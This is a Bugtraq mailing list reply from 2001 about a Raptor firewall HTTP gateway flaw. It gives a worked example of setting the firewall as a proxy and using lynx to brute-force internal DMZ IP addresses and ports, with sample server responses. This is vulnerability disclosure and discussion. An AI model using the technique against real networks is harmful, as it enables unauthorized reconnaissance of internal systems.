Bugtraq mailing list archives

Re: Raptor 6.5 http vulnerability

From: Alexander Bochmann <ab () GXIS DE>
Date: Mon, 26 Mar 2001 17:11:45 +0200

ATA.COM on Sat, Mar 24, 2001 at 05:55:29PM +0100

Hi,

...on Sat, Mar 24, 2001 at 05:55:29PM +0100, Lysel Christian Emre wrote:

1. Problem Description
     The Raptor firewall is vulnerability for forwarding http
     request on other port numbers than 80, if a rule allows http
     traffic.
     When an extern or internal client, configures itself to use
     the nearest interface as proxy, it's possible to access other
     ports that 80 on the target host.

2.1 Non Vulnerable Versions
     Raptor firewall 6.0.2.


Depending on the configuration and on how you try it, 6.0.2
also seems to be vulnerable.

I already noticed some months ago that the Raptor (6.0.2)
firewall's http gateway possibly leaks information about an
internal network with the method you described, if redirected
services are used.

It's possible to brute-force IP addresses used on a DMZ
network: If you use the http gateway on the external
interface as proxy, you can access internal IPs (and
internal DNS names) directly - just try them all ;)

Example:

setenv http_proxy http://external.firewall.name:80/



Now go on with something like...

lynx -mime_header http://192.168.95.1:80/



...you will either get 403 or 503 errors from the gateway
(depending on it's configuration) for the destination:

lynx -mime_header http://192.168.95.2:80/

HTTP/1.1 503 Service Unavailable
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Mon, 26 Mar 2001 14:59:29 GMT
Connection: close
Content-Type: text/html
[.. etc ..]


...or, if you are lucky, an answer from a web server:

% lynx -mime_header http://192.168.95.74:80/
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2001 14:43:19 GMT
Server: Apache/1.3.17 (Unix) mod_perl/1.24_01 PHP/3.0.18
Last-Modified: Thu, 15 Feb 2001 08:23:04 GMT
Accept-Ranges: bytes
Content-Length: 2490
Connection: close
Content-Type: text/html

<!doctype html public "-//IETF//DTD HTML//EN">
[.. etc ..]


On this host, you can now try connections to other ports,
for example:

% lynx -mime_header http://192.168.95.74:901/
HTTP/1.0 400 Server Error
Connection: close
Content-Type: text/html

<HTML><HEAD><TITLE>400 Server Error</TITLE></HEAD><BODY><H1>400 Server Error</H1>Samba is configured to deny access 
from this client
<br>Check your "hosts allow" and "hosts deny" options in smb.conf <p></BODY></HTML>


Oh well, at least they didn't trust all internal IPs ;)

Alex.

Current thread:

Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 25)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
  - Re: Raptor 6.5 http vulnerability Erik Groennerud (Mar 27)
- <Possible follow-ups>
- Re: Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 26)
  - Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
    - Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 27)